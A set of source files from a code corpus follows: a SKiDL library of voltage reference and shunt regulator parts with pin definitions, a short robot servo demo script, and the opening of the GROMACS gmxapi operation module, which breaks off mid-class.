Part(name='LM4040LP-2.0',dest=TEMPLATE,tool=SKIDL,keywords='diode device voltage reference shunt',description='8.192V Precision Micropower Shunt Voltage Reference, TO-92',ref_prefix='D',num_units=1,fplist=['TO?92*'],do_erc=True,aliases=['LM4040LP-2.5', 'LM4040LP-3', 'LM4040LP-4.1', 'LM4040LP-5', 'LM4040LP-8.2', 'LM4040LP-10'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LM4125AIM5-2.5/NOPB',dest=TEMPLATE,tool=SKIDL,keywords='Precision Micropower Low Dropout Voltage Reference 2.5V',description='LM4125-2.5, 2.5V ±0.5% Precision Micropower Low Dropout Voltage Reference, SOT-23-5',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['LM4125IM5-2.0/NOPB', 'LM4125IM5-2.5/NOPB'],pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='Vout',func=Pin.PASSIVE,do_erc=True)]),
Part(name='LT6657AHMS8-2.5',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference vref',description='Precision voltage reference, 40V input, 10mA output, 3.0ppm/C drift, 5.0V output',ref_prefix='U',num_units=1,fplist=['MSOP*3x3mm*Pitch0.65mm*'],do_erc=True,aliases=['LT6657BHMS8-2.5', 'LT6657AHMS8-3', 'LT6657BHMS8-3', 'LT6657AHMS8-5', 'LT6657BHMS8-5'],pins=[
Pin(num='1',name='DNC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~SHDN',do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='DNC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='OUT',func=Pin.PWROUT,do_erc=True),
Pin(num='7',name='DNC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='DNC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='MAX6100',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference ldo',description='Low-dropout high current voltage reference, 4.500V, ±0.4% accuracy, SOT-23 package',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['MAX6101', 'MAX6102', 'MAX6103', 'MAX6104', 'MAX6105', 'MAX6106', 'MAX6107'],pins=[
Pin(num='1',name='IN',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='OUT',func=Pin.PWROUT,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='MCP1525T-I/TO',dest=TEMPLATE,tool=SKIDL,keywords='Voltage Reference 4.096V',description='MCP1541, 4.096V Voltage Reference, TO-92',ref_prefix='U',num_units=1,fplist=['TO-92*'],do_erc=True,aliases=['MCP1541T-I/TO'],pins=[
Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='VSS',func=Pin.PWRIN,do_erc=True)]),
Part(name='MCP1525T-I/TT',dest=TEMPLATE,tool=SKIDL,keywords='Voltage Reference 4.096V',description='MCP1541, 4.096V Voltage Reference, SOT-23',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['MCP1541-I/TT'],pins=[
Pin(num='1',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='VSS',func=Pin.PWRIN,do_erc=True)]),
Part(name='REF02AP',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 5V',description='5V ±10mV Precision Voltage Reference, PDIP-8',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,aliases=['REF02BP'],pins=[
Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='NC',func=Pin.PWRIN,do_erc=True)]),
Part(name='REF02AU',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 5V',description='5V ±10mV Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF02BU'],pins=[
Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='NC',func=Pin.PWRIN,do_erc=True)]),
Part(name='REF102AP',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 10V',description='10V ±2.5mV Precision Voltage Reference, PDIP-8',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,aliases=['REF102BP', 'REF102CP'],pins=[
Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='NR',func=Pin.PASSIVE,do_erc=True)]),
Part(name='REF102AU',dest=TEMPLATE,tool=SKIDL,keywords='Precision Voltage Reference 10V',description='10V ±2.5mV Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF102BU', 'REF102CU'],pins=[
Pin(num='1',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='TEMP',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='TRIM',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='NR',func=Pin.PASSIVE,do_erc=True)]),
Part(name='REF191',dest=TEMPLATE,tool=SKIDL,description='Precision voltage references 4.096V',ref_prefix='U',num_units=1,fplist=['DIP*W7.62mm*', 'SOIC*3.9x4.9m*_Pitch1.27mm*', 'TSSOP*4.4x3mm*Pitch0.65mm*'],do_erc=True,aliases=['REF192', 'REF193', 'REF194', 'REF195', 'REF196', 'REF198'],pins=[
Pin(num='1',name='TP',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='~Sleep~',do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='TP',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='Vout',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='NC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='REF3012',dest=TEMPLATE,tool=SKIDL,keywords='voltage reference',description='4.096V 50-ppm/°C Max, 50-μA, CMOS Voltage Reference in SOT-23-3',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['REF3020', 'REF3025', 'REF3030', 'REF3033', 'REF3040'],pins=[
Pin(num='1',name='IN',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='OUT',func=Pin.PWROUT,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='REF3212AMDBVREP',dest=TEMPLATE,tool=SKIDL,keywords='Micropower Prevision Voltage Reference 4.096V',description='REF3240A, 4.096V 100μA Micropower Precision Voltage Reference, SOT-23-6',ref_prefix='U',num_units=1,fplist=['SOT-23*'],do_erc=True,aliases=['REF3220AMDBVREP', 'REF3225AMDBVREP', 'REF3230AMDBVREP', 'REF3233AMDBVREP', 'REF3240AMDBVREP'],pins=[
Pin(num='1',name='GND_F',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='GND_S',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='ENABLE',do_erc=True),
Pin(num='4',name='IN',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='OUT_S',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='OUT_F',func=Pin.PASSIVE,do_erc=True)]),
Part(name='REF5020AD',dest=TEMPLATE,tool=SKIDL,keywords='Low Noise Precision Voltage Reference 5V',description='5V 0.05% 10mA Low Noise Precision Voltage Reference, SO8',ref_prefix='U',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,aliases=['REF5025AD', 'REF5030AD', 'REF5040AD', 'REF5045AD', 'REF5050AD', 'REF5010AD', 'REF5020ID', 'REF5025ID', 'REF5030ID', 'REF5040ID', 'REF5045ID', 'REF5050ID', 'REF5010ID'],pins=[
Pin(num='1',name='DNC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='Temp',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='Trim/NR',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='8',name='DNC',func=Pin.NOCONNECT,do_erc=True)]),
Part(name='REF5020ADGK',dest=TEMPLATE,tool=SKIDL,keywords='Low Noise Precision Voltage Reference 5V',description='5V 0.05% 10mA Low Noise Precision Voltage Reference, MSOP-8',ref_prefix='U',num_units=1,fplist=['MSOP*3x3mm*Pitch0.65mm*'],do_erc=True,aliases=['REF5025ADGK', 'REF5030ADGK', 'REF5040ADGK', 'REF5045ADGK', 'REF5050ADGK', 'REF5010ADGK', 'REF5020IDGK', 'REF5025IDGK', 'REF5030IDGK', 'REF5040IDGK', 'REF5045IDGK', 'REF5050IDGK', 'REF5010IDGK'],pins=[
Pin(num='1',name='DNC',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='Vin',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='Temp',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='5',name='Trim/NR',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='Vout',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='NC',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='DNC',func=Pin.PWRIN,do_erc=True)]),
Part(name='TL431D',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SO8',ref_prefix='D',num_units=1,fplist=['SOIC*3.9x4.9m*_Pitch1.27mm*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='5',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='7',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431DBV',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT-23*'],do_erc=True,pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='NC_SUBSTRATE',func=Pin.NOCONNECT,do_erc=True),
Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431DBZ',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431DCK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SC-70',ref_prefix='D',num_units=1,fplist=['SC-70*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431KTP',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, TO-252',ref_prefix='D',num_units=1,fplist=['TO*252'],do_erc=True,pins=[
Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431LP',dest=TEMPLATE,tool=SKIDL,keywords='diode device regulator shunt',description='Shunt Regulator, TO-92',ref_prefix='D',num_units=1,fplist=['TO*'],do_erc=True,pins=[
Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431P',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, PDIP-8',ref_prefix='D',num_units=1,fplist=['DIP*W7.62mm*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431PK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-89',ref_prefix='D',num_units=1,fplist=['SOT*89*'],do_erc=True,pins=[
Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='K',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431PS',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, MSOP-8',ref_prefix='D',num_units=1,fplist=['MSOP*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL431PW',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, TSSOP-8',ref_prefix='D',num_units=1,fplist=['TSSOP*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='8',name='REF',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL432DBV',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23-5',ref_prefix='D',num_units=1,fplist=['SOT?23*'],do_erc=True,pins=[
Pin(num='1',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='4',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='REF',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL432DBZ',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-23',ref_prefix='D',num_units=1,fplist=['SOT*23*'],do_erc=True,pins=[
Pin(num='1',name='REF',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='A',func=Pin.PASSIVE,do_erc=True)]),
Part(name='TL432PK',dest=TEMPLATE,tool=SKIDL,keywords='diode device shunt regulator',description='Shunt Regulator, SOT-89',ref_prefix='D',num_units=1,fplist=['SOT*89*'],do_erc=True,pins=[
Pin(num='1',name='K',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='A',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='REF',func=Pin.PASSIVE,do_erc=True)])])
| StarcoderdataPython |
1663629 | <filename>python/test_servo_angles.py
"""
Demo moving the end link back and forth sinusoidally
"""
import time
import numpy as np
import ui
from robot import Robot
# Uncomment the following for simulation
#from robot import SimulatedRobot as Robot
with Robot.connect() as r, ui.basic(r) as gui:
while gui.open:
t = time.time()
f = 0.5 # Hz
A = np.radians(45)
r.servo_angle = np.array([-A*0.5, 0, A])*np.sin(2*np.pi*f*t)
time.sleep(0.01)
| StarcoderdataPython |
8057506 | #
# This file is part of the GROMACS molecular simulation package.
#
# Copyright (c) 2019, by the GROMACS development team, led by
# <NAME>, <NAME>, <NAME>, and <NAME>,
# and including many others, as listed in the AUTHORS file in the
# top-level source directory and at http://www.gromacs.org.
#
# GROMACS is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# GROMACS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with GROMACS; if not, see
# http://www.gnu.org/licenses, or write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# If you want to redistribute modifications to GROMACS, please
# consider that scientific software is very special. Version
# control is crucial - bugs must be traceable. We will be happy to
# consider code for inclusion in the official distribution, but
# derived work must not be called official GROMACS. Details are found
# in the README & COPYING files - if they are missing, get the
# official version at http://www.gromacs.org.
#
# To help us fund GROMACS development, we humbly ask that you cite
# the research papers on the package. Check out http://www.gromacs.org.
"""Define gmxapi-compliant Operations
Provide decorators and base classes to generate and validate gmxapi Operations.
Nodes in a work graph are created as instances of Operations. An Operation factory
accepts well-defined inputs as key word arguments. The object returned by such
a factory is a handle to the node in the work graph. It's ``output`` attribute
is a collection of the Operation's results.
function_wrapper(...) produces a wrapper that converts a function to an Operation
factory. The Operation is defined when the wrapper is called. The Operation is
instantiated when the factory is called. The function is executed when the Operation
instance is run.
The framework ensures that an Operation instance is executed no more than once.
"""
__all__ = ['computed_result',
'append_list',
'concatenate_lists',
'function_wrapper',
'make_constant',
]
import collections
import functools
import inspect
import weakref
from contextlib import contextmanager
from gmxapi import exceptions
class ImmediateResult(object):
"""Data handle for a simple result.
Instances of this class can be used to provide a gmxapi compatible data
handle for trivial operations. Operation and result are stateless and can be
evaluated in any Context.
Used internally to implement the computed_result factory. The interface for
this class will evolve as the gmxapi data model evolves. Generally, code
providing gmxapi data sources should use one of the factories or decorators
provided in the gmxapi.operation module rather than instantiating from this
class directly.
"""
def __init__(self, implementation=None, input=None):
"""Wrap a callable for a simple data source that does not need Future behavior.
Provides a gmxapi compatible interface for data sources.
Arguments:
implementation : Python callable that consumes ``input`` and returns data
input : object compatible with the call signature of ``implementation``
``input`` must have an ``args`` attribute and a ``kwargs`` attribute to be used as
implementation(*input.args, **input.kwargs)
Callers should not assume when or how often ``implementation`` could be called.
Only suitable for function objects without side effects.
"""
assert callable(implementation)
assert hasattr(input, 'args')
assert hasattr(input, 'kwargs')
# Retain input information for introspection.
self.__input = input
self.__cached_value = implementation(*input.args, **input.kwargs)
# TODO: (FR4) need a utility to resolve the base type of a value
# that may be a proxy object.
self._dtype = type(self.__cached_value)
@property
def dtype(self):
"""The data type of the return value for the wrapped function."""
return self._dtype
def result(self):
"""Return value of the wrapped function."""
return self.__cached_value
def computed_result(function):
"""Decorate a function to get a helper that produces an object with Result behavior.
When called, the new function produces an ImmediateResult object.
The new function has the same signature as the original function, but can accept
gmxapi data proxies, assuming the provided proxy objects represent types
compatible with the original signature.
Calls to `result()` return the value that `function` would return when executed
in the local context with the inputs fully resolved.
The API does not specify when input data dependencies will be resolved
or when the wrapped function will be executed. That is, ``@computed_result``
functions may force immediate resolution of data dependencies and/or may
be called more than once to satisfy dependent operation inputs.
"""
@functools.wraps(function)
def new_function(*args, **kwargs):
# The signature of the new function will accept abstractions
# of whatever types it originally accepted. This wrapper must
# * Create a mapping to the original call signature from `input`
# * Add handling for typed abstractions in wrapper function.
# * Process arguments to the wrapper function into `input`
sig = inspect.signature(function)
# Note: Introspection could fail.
# TODO: Figure out what to do with exceptions where this introspection
# and rebinding won't work.
# ref: https://docs.python.org/3/library/inspect.html#introspecting-callables-with-the-signature-object
# TODO: (FR3+) create a serializable data structure for inputs discovered
# from function introspection.
# TODO: (FR4) handle typed abstractions in input arguments
input_list = []
for arg in args:
if hasattr(arg, 'result'):
input_list.append(arg.result())
else:
input_list.append(arg)
input_dict = {}
for name, value in kwargs.items():
if hasattr(value, 'result'):
input_dict[name] = value.result()
else:
input_dict[name] = value
input_pack = sig.bind(*input_list, **input_dict)
result_object = ImmediateResult(function, input_pack)
return result_object
return new_function
@computed_result
def append_list(a: list = (), b: list = ()):
"""Operation that consumes two lists and produces a concatenated single list."""
# TODO: (FR4) Returned list should be an NDArray.
if isinstance(a, (str, bytes)) or isinstance(b, (str, bytes)):
raise exceptions.ValueError('Input must be a pair of lists.')
try:
list_a = list(a)
except TypeError:
list_a = list([a])
try:
list_b = list(b)
except TypeError:
list_b = list([b])
return list_a + list_b
def concatenate_lists(sublists: list = ()):
"""Combine data sources into a single list.
A trivial data flow restructuring operation
"""
if isinstance(sublists, (str, bytes)):
raise exceptions.ValueError('Input must be a list of lists.')
if len(sublists) == 0:
return []
else:
return append_list(sublists[0], concatenate_lists(sublists[1:]))
@computed_result
def make_constant(value):
"""Provide a predetermined value at run time.
This is a trivial operation that provides a (typed) value, primarily for
internally use to manage gmxapi data flow.
Accepts a value of any type. The object returned has a definite type and
provides same interface as other gmxapi outputs. Additional constraints or
guarantees on data type may appear in future versions.
"""
# TODO: (FR4+) Manage type compatibility with gmxapi data interfaces.
return type(value)(value)
# In the longer term, Contexts could provide metaclasses that allow transformation or dispatching
# of the basic aspects of the operation protocols between Contexts or from a result handle into a
# new context, based on some attribute or behavior in the result handle.
# TODO: For outputs, distinguish between "results" and "events".
# Both are published to the resource manager in the same way, but the relationship
# with subscribers is potentially different.
def function_wrapper(output=None):
"""Generate a decorator for wrapped functions with signature manipulation.
New function accepts the same arguments, with additional arguments required by
the API.
The new function returns an object with an `output` attribute containing the named outputs.
Example:
@function_wrapper(output={'spam': str, 'foo': str})
def myfunc(parameter: str = None, output=None):
output.spam = parameter
output.foo = parameter + ' ' + parameter
operation1 = myfunc(parameter='spam spam')
assert operation1.output.spam.result() == 'spam spam'
assert operation1.output.foo.result() == 'spam spam spam spam'
"""
# TODO: more flexibility to capture return value by default?
# If 'output' is provided to the wrapper, a data structure will be passed to
# the wrapped functions with the named attributes so that the function can easily
# publish multiple named results. Otherwise, the `output` of the generated operation
# will just capture the return value of the wrapped function.
# For now, this behavior is obtained with @computed_result
# TODO: (FR5+) gmxapi operations need to allow a context-dependent way to generate an implementation with input.
# This function wrapper reproduces the wrapped function's kwargs, but does not allow chaining a
# dynamic `input` kwarg and does not dispatch according to a `context` kwarg. We should allow
# a default implementation and registration of alternate implementations. We don't have to do that
# with functools.singledispatch, but we could, if we add yet another layer to generate a wrapper
# that takes the context as the first argument. (`singledispatch` inspects the first argument rather
# that a named argument)
# Implementation note: The closure of the current function is used to
# dynamically define several classes that support the operation to be
# created by the returned decorator.
# Encapsulate the description of the input data flow.
PyFuncInput = collections.namedtuple('Input', ('args', 'kwargs', 'dependencies'))
# Encapsulate the description of a data output.
Output = collections.namedtuple('Output', ('name', 'dtype', 'done', 'data'))
class Publisher(object):
"""Data descriptor for write access to a specific named data resource.
For a wrapped function receiving an ``output`` argument, provides the
accessors for an attribute on the object passed as ``output``. Maps
read and write access by the wrapped function to appropriate details of
the resource manager.
Used internally to implement settable attributes on PublishingDataProxy.
Allows PublishingDataProxy to be dynamically defined in the scope of the
operation.function_wrapper closure. Each named output is represented by
an instance of Publisher in the PublishingDataProxy class definition for
the operation.
Ref: https://docs.python.org/3/reference/datamodel.html#implementing-descriptors
Collaborations:
Relies on implementation details of ResourceManager.
"""
def __init__(self, name, dtype):
self.name = name
self.dtype = dtype
def __get__(self, instance, owner):
if instance is None:
# Access through class attribute of owner class
return self
resource_manager = instance._instance
return getattr(resource_manager._data, self.name)
def __set__(self, instance, value):
resource_manager = instance._instance
resource_manager.set_result(self.name, value)
def __repr__(self):
return 'Publisher(name={}, dtype={})'.format(self.name, self.dtype.__qualname__)
class DataProxyBase(object):
"""Limited interface to managed resources.
Inherit from DataProxy to specialize an interface to an ``instance``.
In the derived class, either do not define ``__init__`` or be sure to
initialize the super class (DataProxy) with an instance of the object
to be proxied.
Acts as an owning handle to ``instance``, preventing the reference count
of ``instance`` from going to zero for the lifetime of the proxy object.
"""
def __init__(self, instance):
self._instance = instance
# Dynamically define a type for the PublishingDataProxy using a descriptor for each attribute.
# TODO: Encapsulate this bit of script in a metaclass definition.
namespace = {}
for name, dtype in output.items():
namespace[name] = Publisher(name, dtype)
namespace['__doc__'] = "Handler for write access to the `output` of an operation.\n\n" + \
"Acts as a sort of PublisherCollection."
PublishingDataProxy = type('PublishingDataProxy', (DataProxyBase,), namespace)
class ResultGetter(object):
"""Fetch data to the caller's Context.
Returns an object of the concrete type specified according to
the operation that produces this Result.
"""
def __init__(self, resource_manager, name, dtype):
self.resource_manager = resource_manager
self.name = name
self.dtype = dtype
def __call__(self):
self.resource_manager.update_output()
assert self.resource_manager._data[self.name].done
# Return ownership of concrete data
return self.resource_manager._data[self.name].data
class Future(object):
def __init__(self, resource_manager, name, dtype):
self.name = name
if not isinstance(dtype, type):
raise exceptions.ValueError('dtype argument must specify a type.')
self.dtype = dtype
# This abstraction anticipates that a Future might not retain a strong
# reference to the resource_manager, but only to a facility that can resolve
# the result() call. Additional aspects of the Future interface can be
# developed without coupling to a specific concept of the resource manager.
self._result = ResultGetter(resource_manager, name, dtype)
def result(self):
return self._result()
def __getitem__(self, item):
"""Get a more limited view on the Future."""
# TODO: Strict definition of outputs and output types can let us validate this earlier.
# We need AssociativeArray and NDArray so that we can type the elements.
# Allowing a Future with None type is a hack.
def result():
return self.result()[item]
future = collections.namedtuple('Future', ('dtype', 'result'))(None, result)
return future
class OutputDescriptor(object):
"""Read-only data descriptor for proxied output access.
Knows how to get a Future from the resource manager.
"""
def __init__(self, name, dtype):
self.name = name
self.dtype = dtype
def __get__(self, proxy, owner):
if proxy is None:
# Access through class attribute of owner class
return self
return proxy._instance.future(name=self.name, dtype=self.dtype)
class OutputDataProxy(DataProxyBase):
"""Handler for read access to the `output` member of an operation handle.
Acts as a sort of ResultCollection.
A ResourceManager creates an OutputDataProxy instance at initialization to
provide the ``output`` property of an operation handle.
"""
# TODO: Needs to know the output schema of the operation,
# so type definition is a detail of the operation definition.
# (Could be "templated" on Context type)
# TODO: (FR3+) We probably want some other container behavior,
# in addition to the attributes...
for name, dtype in output.items():
setattr(OutputDataProxy, name, OutputDescriptor(name, dtype))
class ResourceManager(object):
"""Provides data publication and subscription services.
Owns the data published by the operation implementation or served to consumers.
Mediates read and write access to the managed data streams.
This ResourceManager implementation is defined in conjunction with a
run-time definition of an Operation that wraps a Python callable (function).
ResourceManager is instantiated with a reference to the callable.
When the Operation is run, the resource manager prepares resources for the wrapped
function. Inputs provided to the Operation factory are provided to the
function as keyword arguments. The wrapped function publishes its output
through the (additional) ``output`` key word argument. This argument is
a short-lived resource, prepared by the ResourceManager, with writable
attributes named in the call to function_wrapper().
After the Operation has run and the outputs published, the data managed
by the ResourceManager is marked "done."
Protocols:
The data() method produces a read-only collection of outputs named for
the Operation when the Operation's ``output`` attribute is accessed.
publishing_resources() can be called once during the ResourceManager lifetime
to provide the ``output`` object for the wrapped function. (Used by update_output().)
update_output() brings the managed output data up-to-date with the input
when the Operation results are needed. If the Operation has not run, an
execution session is prepared with input and output arguments for the
wrapped Python callable. Output is publishable only during this session.
TODO: This functionality should evolve to be a facet of Context implementations.
There should be no more than one ResourceManager instance per work graph
node in a Context. This will soon be at odds with letting the ResourceManager
be owned by an operation instance handle.
TODO: The publisher and data objects can be more strongly defined through
interaction between the Context and clients.
"""
@contextmanager
